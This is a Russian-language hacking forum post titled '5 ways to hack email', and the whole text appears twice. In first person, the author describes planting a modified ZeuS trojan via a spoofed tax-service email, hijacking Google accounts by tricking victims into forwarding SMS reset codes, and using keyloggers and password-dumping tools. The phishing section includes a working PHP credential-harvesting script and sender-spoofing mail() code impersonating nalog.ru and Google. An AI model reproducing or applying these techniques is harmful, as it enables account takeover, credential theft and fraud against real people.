- Lolz
- Автор темы
- Команда форума
- 142
5 Способов взлома электронной почты
Способ 1: троян
Довольно распространенным способом получения доступа к чужому ящику является рассылка электронных писем со встроенными вирусами. В письме будет ссылка на загрузку вредоносного файла. Обычно содержание письма должно чем-то «зацепить» пользователя. Оно должно быть таким, на которое пользователь не сможет не отреагировать.
Я использовал модифицированную версию трояна ZeuS, а в качестве жертвы была выбрана бухгалтер одной из компаний.
Итак, у меня есть модифицированный ZeuS, но как заставить бухгалтера запустить его? Если просто отправить ей ссылку, понятно дело, она переходить по ней не будет. Обещать золотые горы в письме — тоже прошлый век, на такое пользователи уже не реагируют.
Было решено отправить письмо от имени Федеральной Налоговой службы. Это как раз именно то, что «зацепит» жертву.
MAVRODICH
Чтобы поле From содержало внушительное название, а не xaker134566788@mail.ru, мной были подделаны заголовки письма. Про это в 5 способе написано.
Как я и рассчитывал, жертва скачала программу и запустила инсталлятор обновления формы отчетности. Инсталлятор сделан с помощью Inno Setup за 5 минут. Именно он установит и запустит мой троян.
MAVRODICH
Установщик трояна
После этого я могу полностью контролировать компьютер жертвы:
MAVRODICH
Что я могу? Можно ради интереса просмотреть список процессов компьютера, в котором, ясное дело, не будет моего трояна. Можно просмотреть файловую систему.
MAVRODICH
Список процессов на компьютере жертвы
MAVRODICH
Файловая система на компьютере жертвы
Конечно, самое главное, ради чего все это затевалось — список паролей, сохраненных в браузере:
MAVRODICH
Письмо и инсталлятор далеки от идеала, поскольку все делалось на скорую руку. Однако, моя затея увенчалась успехом. Для достижения своей цели я объединил целых два способа — социальную инженерию и «поддельное» письмо. Оба эти способа будут рассмотрены далее.
Эффективность: средняя
Сложность: средняя
Стоимость: низкая
Способ 2: взлом по номеру телефона
Суть этого способа заключается в том, что мне нужно знать номер телефона жертвы, указанный при регистрации почтового ящика. При сбросе пароля почтовая служба требует ввести последние символы номера телефона (или выбрать номер телефона из списка). На этот номер будет отправлено SMS с кодом подтверждения сброса пароля. Затем я отправляю второе SMS с требованием указать код из предыдущего SMS.
Пользователь, ничего не подозревая, отправляет код из первой SMS. Самый большой недостаток этого способа в том, что первая SMS придет от Google, а вторая — с неизвестного номера. Успех этого способа зависит от сообразительности жертвы.
Первым делом попытаюсь просто сбросить пароль, после чего Google попросит ввести тот пароль, который я запомню. Понятное дело, пароль я не помню, поэтому жму кнопку "Затрудняюсь ответить".
MAVRODICH
Запрос на восстановление пароля
Далее если у моей жертвы был привязан к аккаунту Android-телефон, то Google предложит отправить оповещение. Примечательно, но смартфон не издал ни единого звука, а просто отобразил оповещение.
Кстати, если же жертва нажмет "Нет", то не отчаивайтесь — повторите данный процесс несколько раз
MAVRODICH
Предложение отправить оповещение
MAVRODICH
Оповещение Google
После нажатия кнопки "отправить оповещение" откроется страница, изображенная на скрине ниже. Переходим по ссылке "Сбросьте пароль другим способом". Откроется классическая страница сброса пароля через SMS-код. Эта же страница откроется, если к аккаунту не привязан Android-телефон.
MAVRODICH
MAVRODICH
Отправка SMS-кода
Настал кульминационный момент. Жертва получает код подтверждения Google:
Код подтверждения
Далее я должен с другого телефона сразу же отправить примерно такое сообщение:
MAVRODICH
Сообщение от злоумышленника
С одной стороны, пользователь может обратить внимание на неизвестный номер. С другой стороны, поставьте себя на место среднестатистического пользователя. Сначала он получает уведомление о сбросе пароля, потом SMS с кодом подтверждения, а после — сообщение о том, что замечена подозрительная активность.
Я получил код активации, который потом был указан на странице восстановления пароля. Таким образом, мне получилось сбросить пароль аккаунта и заполучить доступ к почтовому ящику.
Получение доступа к почтовому ящику — это еще не все. Чтобы жертва не догадалась, что ее ящик увели, после сброса пароля нужно создать временный пароль и отправить его по SMS, а самому тем временем сделать переадресацию на свой «хакерский» ящик. Так можно получить контроль над ящиком, не вызвав особых подозрений.
MAVRODICH
Эффективность: средняя
Сложность: низкая
Стоимость: низкая
Способ 3: доступ к компьютеру
Если у вас есть доступ к компьютеру жертвы, то можете считать, что почту вы уже взломали. Вы можете запустить на компьютере или кейлоггер или программу для «восстановления» паролей почтовых учетных записей.
Суть кейлоггера в том, что в специальный файл он записывает все, что пользователь вводит с клавиатуры.
К преимуществам кейлоггера относится то, что он записывает все подряд. Поэтому кроме паролей можно получить еще много интересной информации о своей жертве.
Программы для «восстановления» паролей почтовых учетных записей позволяют сразу получить все интересующие вас пароли без необходимости чтения мегабайтов текста в поиске нужного вам пароля. К тому же на них никак не реагирует антивирус. Одна из таких программ — это Mail PassView.
Программу я проверил на своих компьютерах и заявляю: она работает. Пароли, как и адреса e-mail затерты по понятным причинам.
MAVRODICH
Mail PassView — не единственная программа в своем роде. Существуют и другие программы:
Я протестировал и эту утилиту. Программа успешно восстановила все пароли, хранящиеся в браузерах IE, Firefox, Chrome и Opera (Safari мной не тестировался, но, считаю, что и там будет полный «порядок»). Даже если вы не найдете среди этого списка пароль от почтового ящика, сей список будет тоже полезен — ведь люди часто используют одни и те же пароли для разных служб.
Для удобства программа позволяет сохранить выбранные пароли в текстовый файл, который потом можно неспешно изучить на своем компьютере.
Раз я уже заговорил о восстановлении паролей, то вам может пригодиться программа Dialupass, восстанавливающая dialup/RAS/VPN-пароли.
Эффективность: высокая
Сложность: низкая
Стоимость: низкая
Способ 4: социальная инженерия
Об этом способе не писал только ленивый. Многое было уже сказано. Вам кажется, что этот способ не такой эффективный, как о нем говорят? Вы ошибаетесь.
Не так давно была взломана почта директора ЦРУ Джона Бреннана. Абсурдность ситуации в том, что почту взломал не «матерый» хакер, а обычный подросток, правильно собрав информацию о своей «жертве». Подросток сначала связался с сотовым оператором, представившись сотрудником технической поддержки, уточнил детали аккаунта Бреннана.После этого он позволил в AOL и, представившись Бреннаном, попросил сбросить его пароль. Поскольку он знал всю необходимую информацию (номер почтового аккаунта, последние цифры банковской карты, 4-значный PIN-код, номер телефона), пароль был сброшен и никто ничего не заподозрил.Чуть позже Wikileaks опубликовал письма директора ЦРУ:
MAVRODICHПреимущество этого способа в том, что не нужно обладать никакими специальными знаниями и этот способ под силу любому. Успех этого метода зависит от смекалки «нападающего» — сможет ли он найти нужную информацию или нет.
Эффективность: высокая
Сложность: средняя
Стоимость: низкая
Способ 5: фишинг
Попрошу пользователя самого сообщить нам свой пароль. Нет, этот способ не подразумевает физического насилия и ни один из пользователей в результате эксперимента не пострадает. Во всяком случае, физически
Суть этого метода в следующем: нужно создать фейк страницы авторизации того сервиса, который я хочц взломать. Например, если я хочу получить пароль от почты GMail.com, тогда нужно создать такую же страницу входа.
Далее нужно заманить пользователя на фейковую страницу. Это можно сделать несколькими способами:
• Отправить ему сообщение якобы от имени администрации того сервиса. В сообщении указать, что-то вроде «Вы давно не заходили в свой почтовый ящик. Если вы не воспользуетесь ним до <Д>.<М>.<Г>, он будет удален.». Рисуем кнопочку "Войти", нажав которую пользователь попадет на вашу страницу авторизации.
• Отправить сообщение со ссылкой, которая должна заинтересовать пользователя. Когда он перейдет по ней, он увидит сообщение о необходимости входа для просмотра содержимого. Сейчас многие сервисы позволяют войти с помощью учетной записи GMail или одной из социальных сетей. Так что пользователь может ничего и не заподозрить.
Итак, я создал форму авторизации, похожую на форму входа в Google. Результат моих страданий изображен ниже. Конечно, можно было бы и лучше, но я спешил.
MAVRODICH
Далее я отправил нескольким жертвам сообщение о том, что их почтовый ящик будет заблокирован. Обратите внимание, что дизайн письма даже отдаленно (если не считать логотипа) не напоминает дизайн, используемый Google. Но, как показала практика, для моих пользователей этого было достаточно. Можно было бы взять исходный код письма, которое отправляет Google, сделать все более качественно. В реальных условиях я бы так и сделал — будьте уверены.
MAVRODICH
Что произошло дальше? Дальше жертвы прочитали письмо, перешли по ссылке и наивно ввели имя пользователя и пароль, которые были переданы сценарию. Сценарий принимает эти данные и записывает в текстовый файл. Написать такой сценарий сможет любой новичок, владеющий основами PHP. Примерный код сценария (это не тот сценарий, который использовал я) приведен ниже:
<?php
// введенный логин
$login = $_POST['Login'];
// браузер пользователя
$browser = getenv("HTTP_USER_AGENT");
// Пароль
$pass = $_POST['password'];
// Записываем полученные данные
$text = "Login = $login\nPassword = $pass\nBrowser = $browser";
// открываем файл
$filelog = fopen("log.txt","a+");
// записываем строку
fwrite($filelog,"\n $text \n");
fclose($filelog); // закрываем
// перенаправляем пользователю на страницу входа в google, чтобы
// меньше было подозрений
header('Location: https://accounts.google.com/Service...inue=https://mail.google.com/mail/&ss=1&scc=1<mpl=default<mplcache=2&emr=1&osid=1#identifier ');
?>
Результат работы моего сценария:
MAVRODICH
Еще раз отмечу, что все делалось на скорую руку. А для отправки сообщения использовалась почта Yahoo!, чтобы не бороться с антиспамом. Но можно было бы пойти и по иному пути. Например, найти сервер SMTP со свободной отправкой писем (без авторизации). Как правило, это будет неправильно настроенный SMTP-сервер какой-то небольшой организации. Списки таких серверов регулярно обновляются на специальных ресурсах. Думаю, не составит особого труда найти такой список.
С другой стороны, можно попытаться отправить сообщение и через собственный хостинг (не обязательно устанавливать локальный веб-сервер). Все зависит от его настроек. Я, например, для выполнения сценария отправки моего сообщения использовал собственный хостинг. На нем функция mail() выполнилась без особых нареканий. Понятно, что если просмотреть все заголовки письма, «след» приведет ко-мне. Но для меня сейчас это не важно. Сейчас важно, чтобы в почтовом клиенте поле «От» содержало то, что мне нужно. В первом способе я поступили именно так, то есть для отправки сообщения использовал функцию mail().
Стандартная PHP-функция mail() позволяет с легкостью указать, как текст письма, так и его заголовки. Например:
$headers = 'From: Федеральная налоговая служба <no-reply@nalog.ru>' ."\r\n" .
'Reply-To: no-reply@nalog.ru' . "\r\n";
mail($to, $subject, $message, $headers);
$headers = 'From: Google <no-reply@accounts.google.com>' ."\r\n" .
'Reply-To: no-reply@accounts.google.com' . "\r\n";
mail($to, $subject, $message, $headers);
Письма, отправленные таким образом, миновали антиспам Google (не попали в папку Спам) и нормально отображались, как в почтовом клиенте (проверялось в Outlook и The Bat!), так и в веб-интерфейсе. Конечно, перед отправкой сообщения жертве лучше отправить его на свой ящик и убедиться, что письмо отображается правильно, как минимум, что почтовый клиент правильно определяет кодировку. Если это не так, в $headers нужно добавить заголовки, описывающие кодировку письма.
Определенные результаты при использовании этого метода я получил. Некоторые из пользователей оставили свои реальные пароли. Некоторые не отреагировали на это письмо. Некоторые догадались, в чем дело и вместо пароля ввели абракадабру. Столь посредственные результаты обусловлены тем, что я не готовился особо и сделал и форму входа, и само письмо весьма некачественно. Но все же я получил несколько реальных паролей, так что этот метод работает, не смотря на весь скептицизм.
Способ 1: троян
Довольно распространенным способом получения доступа к чужому ящику является рассылка электронных писем со встроенными вирусами. В письме будет ссылка на загрузку вредоносного файла. Обычно содержание письма должно чем-то «зацепить» пользователя. Оно должно быть таким, на которое пользователь не сможет не отреагировать.
Я использовал модифицированную версию трояна ZeuS, а в качестве жертвы была выбрана бухгалтер одной из компаний.
Итак, у меня есть модифицированный ZeuS, но как заставить бухгалтера запустить его? Если просто отправить ей ссылку, понятно дело, она переходить по ней не будет. Обещать золотые горы в письме — тоже прошлый век, на такое пользователи уже не реагируют.
Было решено отправить письмо от имени Федеральной Налоговой службы. Это как раз именно то, что «зацепит» жертву.
MAVRODICH
Чтобы поле From содержало внушительное название, а не xaker134566788@mail.ru, мной были подделаны заголовки письма. Про это в 5 способе написано.
Как я и рассчитывал, жертва скачала программу и запустила инсталлятор обновления формы отчетности. Инсталлятор сделан с помощью Inno Setup за 5 минут. Именно он установит и запустит мой троян.
MAVRODICH
Установщик трояна
После этого я могу полностью контролировать компьютер жертвы:
MAVRODICH
Что я могу? Можно ради интереса просмотреть список процессов компьютера, в котором, ясное дело, не будет моего трояна. Можно просмотреть файловую систему.
MAVRODICH
Список процессов на компьютере жертвы
MAVRODICH
Файловая система на компьютере жертвы
Конечно, самое главное, ради чего все это затевалось — список паролей, сохраненных в браузере:
MAVRODICH
Письмо и инсталлятор далеки от идеала, поскольку все делалось на скорую руку. Однако, моя затея увенчалась успехом. Для достижения своей цели я объединил целых два способа — социальную инженерию и «поддельное» письмо. Оба эти способа будут рассмотрены далее.
Эффективность: средняя
Сложность: средняя
Стоимость: низкая
Способ 2: взлом по номеру телефона
Суть этого способа заключается в том, что мне нужно знать номер телефона жертвы, указанный при регистрации почтового ящика. При сбросе пароля почтовая служба требует ввести последние символы номера телефона (или выбрать номер телефона из списка). На этот номер будет отправлено SMS с кодом подтверждения сброса пароля. Затем я отправляю второе SMS с требованием указать код из предыдущего SMS.
Пользователь, ничего не подозревая, отправляет код из первой SMS. Самый большой недостаток этого способа в том, что первая SMS придет от Google, а вторая — с неизвестного номера. Успех этого способа зависит от сообразительности жертвы.
Первым делом попытаюсь просто сбросить пароль, после чего Google попросит ввести тот пароль, который я запомню. Понятное дело, пароль я не помню, поэтому жму кнопку "Затрудняюсь ответить".
MAVRODICH
Запрос на восстановление пароля
Далее если у моей жертвы был привязан к аккаунту Android-телефон, то Google предложит отправить оповещение. Примечательно, но смартфон не издал ни единого звука, а просто отобразил оповещение.
Кстати, если же жертва нажмет "Нет", то не отчаивайтесь — повторите данный процесс несколько раз
MAVRODICH
Предложение отправить оповещение
MAVRODICH
Оповещение Google
После нажатия кнопки "отправить оповещение" откроется страница, изображенная на скрине ниже. Переходим по ссылке "Сбросьте пароль другим способом". Откроется классическая страница сброса пароля через SMS-код. Эта же страница откроется, если к аккаунту не привязан Android-телефон.
MAVRODICH
MAVRODICH
Отправка SMS-кода
Настал кульминационный момент. Жертва получает код подтверждения Google:
Код подтверждения
Далее я должен с другого телефона сразу же отправить примерно такое сообщение:
MAVRODICH
Сообщение от злоумышленника
С одной стороны, пользователь может обратить внимание на неизвестный номер. С другой стороны, поставьте себя на место среднестатистического пользователя. Сначала он получает уведомление о сбросе пароля, потом SMS с кодом подтверждения, а после — сообщение о том, что замечена подозрительная активность.
Я получил код активации, который потом был указан на странице восстановления пароля. Таким образом, мне получилось сбросить пароль аккаунта и заполучить доступ к почтовому ящику.
Получение доступа к почтовому ящику — это еще не все. Чтобы жертва не догадалась, что ее ящик увели, после сброса пароля нужно создать временный пароль и отправить его по SMS, а самому тем временем сделать переадресацию на свой «хакерский» ящик. Так можно получить контроль над ящиком, не вызвав особых подозрений.
MAVRODICH
Эффективность: средняя
Сложность: низкая
Стоимость: низкая
Способ 3: доступ к компьютеру
Если у вас есть доступ к компьютеру жертвы, то можете считать, что почту вы уже взломали. Вы можете запустить на компьютере или кейлоггер или программу для «восстановления» паролей почтовых учетных записей.
Суть кейлоггера в том, что в специальный файл он записывает все, что пользователь вводит с клавиатуры.
К преимуществам кейлоггера относится то, что он записывает все подряд. Поэтому кроме паролей можно получить еще много интересной информации о своей жертве.
Программы для «восстановления» паролей почтовых учетных записей позволяют сразу получить все интересующие вас пароли без необходимости чтения мегабайтов текста в поиске нужного вам пароля. К тому же на них никак не реагирует антивирус. Одна из таких программ — это Mail PassView.
Программу я проверил на своих компьютерах и заявляю: она работает. Пароли, как и адреса e-mail затерты по понятным причинам.
MAVRODICH
Mail PassView — не единственная программа в своем роде. Существуют и другие программы:
- Outlook Password Decryptor — позволяет восстановить пароли из Outlook, в том числе самых последних версий (Outlook 2015, работающей под управлением Windows 10);
- PstPassword — еще одна программа для восстановления паролей, сохраненных в Outlook;
- WebBrowserPassView — программа для восстановления паролей, хранящихся в браузере. Поддерживаются браузеры IE, Chrome, Opera, Safari, Firefox.
Я протестировал и эту утилиту. Программа успешно восстановила все пароли, хранящиеся в браузерах IE, Firefox, Chrome и Opera (Safari мной не тестировался, но, считаю, что и там будет полный «порядок»). Даже если вы не найдете среди этого списка пароль от почтового ящика, сей список будет тоже полезен — ведь люди часто используют одни и те же пароли для разных служб.
Для удобства программа позволяет сохранить выбранные пароли в текстовый файл, который потом можно неспешно изучить на своем компьютере.
Раз я уже заговорил о восстановлении паролей, то вам может пригодиться программа Dialupass, восстанавливающая dialup/RAS/VPN-пароли.
Эффективность: высокая
Сложность: низкая
Стоимость: низкая
Способ 4: социальная инженерия
Об этом способе не писал только ленивый. Многое было уже сказано. Вам кажется, что этот способ не такой эффективный, как о нем говорят? Вы ошибаетесь.
Не так давно была взломана почта директора ЦРУ Джона Бреннана. Абсурдность ситуации в том, что почту взломал не «матерый» хакер, а обычный подросток, правильно собрав информацию о своей «жертве». Подросток сначала связался с сотовым оператором, представившись сотрудником технической поддержки, уточнил детали аккаунта Бреннана.После этого он позволил в AOL и, представившись Бреннаном, попросил сбросить его пароль. Поскольку он знал всю необходимую информацию (номер почтового аккаунта, последние цифры банковской карты, 4-значный PIN-код, номер телефона), пароль был сброшен и никто ничего не заподозрил.Чуть позже Wikileaks опубликовал письма директора ЦРУ:
MAVRODICHПреимущество этого способа в том, что не нужно обладать никакими специальными знаниями и этот способ под силу любому. Успех этого метода зависит от смекалки «нападающего» — сможет ли он найти нужную информацию или нет.
Эффективность: высокая
Сложность: средняя
Стоимость: низкая
Способ 5: фишинг
Попрошу пользователя самого сообщить нам свой пароль. Нет, этот способ не подразумевает физического насилия и ни один из пользователей в результате эксперимента не пострадает. Во всяком случае, физически
Суть этого метода в следующем: нужно создать фейк страницы авторизации того сервиса, который я хочц взломать. Например, если я хочу получить пароль от почты GMail.com, тогда нужно создать такую же страницу входа.
Далее нужно заманить пользователя на фейковую страницу. Это можно сделать несколькими способами:
• Отправить ему сообщение якобы от имени администрации того сервиса. В сообщении указать, что-то вроде «Вы давно не заходили в свой почтовый ящик. Если вы не воспользуетесь ним до <Д>.<М>.<Г>, он будет удален.». Рисуем кнопочку "Войти", нажав которую пользователь попадет на вашу страницу авторизации.
• Отправить сообщение со ссылкой, которая должна заинтересовать пользователя. Когда он перейдет по ней, он увидит сообщение о необходимости входа для просмотра содержимого. Сейчас многие сервисы позволяют войти с помощью учетной записи GMail или одной из социальных сетей. Так что пользователь может ничего и не заподозрить.
Итак, я создал форму авторизации, похожую на форму входа в Google. Результат моих страданий изображен ниже. Конечно, можно было бы и лучше, но я спешил.
MAVRODICH
Далее я отправил нескольким жертвам сообщение о том, что их почтовый ящик будет заблокирован. Обратите внимание, что дизайн письма даже отдаленно (если не считать логотипа) не напоминает дизайн, используемый Google. Но, как показала практика, для моих пользователей этого было достаточно. Можно было бы взять исходный код письма, которое отправляет Google, сделать все более качественно. В реальных условиях я бы так и сделал — будьте уверены.
MAVRODICH
Что произошло дальше? Дальше жертвы прочитали письмо, перешли по ссылке и наивно ввели имя пользователя и пароль, которые были переданы сценарию. Сценарий принимает эти данные и записывает в текстовый файл. Написать такой сценарий сможет любой новичок, владеющий основами PHP. Примерный код сценария (это не тот сценарий, который использовал я) приведен ниже:
<?php
// введенный логин
$login = $_POST['Login'];
// браузер пользователя
$browser = getenv("HTTP_USER_AGENT");
// Пароль
$pass = $_POST['password'];
// Записываем полученные данные
$text = "Login = $login\nPassword = $pass\nBrowser = $browser";
// открываем файл
$filelog = fopen("log.txt","a+");
// записываем строку
fwrite($filelog,"\n $text \n");
fclose($filelog); // закрываем
// перенаправляем пользователю на страницу входа в google, чтобы
// меньше было подозрений
header('Location: https://accounts.google.com/Service...inue=https://mail.google.com/mail/&ss=1&scc=1<mpl=default<mplcache=2&emr=1&osid=1#identifier ');
?>
Результат работы моего сценария:
MAVRODICH
Еще раз отмечу, что все делалось на скорую руку. А для отправки сообщения использовалась почта Yahoo!, чтобы не бороться с антиспамом. Но можно было бы пойти и по иному пути. Например, найти сервер SMTP со свободной отправкой писем (без авторизации). Как правило, это будет неправильно настроенный SMTP-сервер какой-то небольшой организации. Списки таких серверов регулярно обновляются на специальных ресурсах. Думаю, не составит особого труда найти такой список.
С другой стороны, можно попытаться отправить сообщение и через собственный хостинг (не обязательно устанавливать локальный веб-сервер). Все зависит от его настроек. Я, например, для выполнения сценария отправки моего сообщения использовал собственный хостинг. На нем функция mail() выполнилась без особых нареканий. Понятно, что если просмотреть все заголовки письма, «след» приведет ко-мне. Но для меня сейчас это не важно. Сейчас важно, чтобы в почтовом клиенте поле «От» содержало то, что мне нужно. В первом способе я поступили именно так, то есть для отправки сообщения использовал функцию mail().
Стандартная PHP-функция mail() позволяет с легкостью указать, как текст письма, так и его заголовки. Например:
$headers = 'From: Федеральная налоговая служба <no-reply@nalog.ru>' ."\r\n" .
'Reply-To: no-reply@nalog.ru' . "\r\n";
mail($to, $subject, $message, $headers);
$headers = 'From: Google <no-reply@accounts.google.com>' ."\r\n" .
'Reply-To: no-reply@accounts.google.com' . "\r\n";
mail($to, $subject, $message, $headers);
Письма, отправленные таким образом, миновали антиспам Google (не попали в папку Спам) и нормально отображались, как в почтовом клиенте (проверялось в Outlook и The Bat!), так и в веб-интерфейсе. Конечно, перед отправкой сообщения жертве лучше отправить его на свой ящик и убедиться, что письмо отображается правильно, как минимум, что почтовый клиент правильно определяет кодировку. Если это не так, в $headers нужно добавить заголовки, описывающие кодировку письма.
Определенные результаты при использовании этого метода я получил. Некоторые из пользователей оставили свои реальные пароли. Некоторые не отреагировали на это письмо. Некоторые догадались, в чем дело и вместо пароля ввели абракадабру. Столь посредственные результаты обусловлены тем, что я не готовился особо и сделал и форму входа, и само письмо весьма некачественно. Но все же я получил несколько реальных паролей, так что этот метод работает, не смотря на весь скептицизм.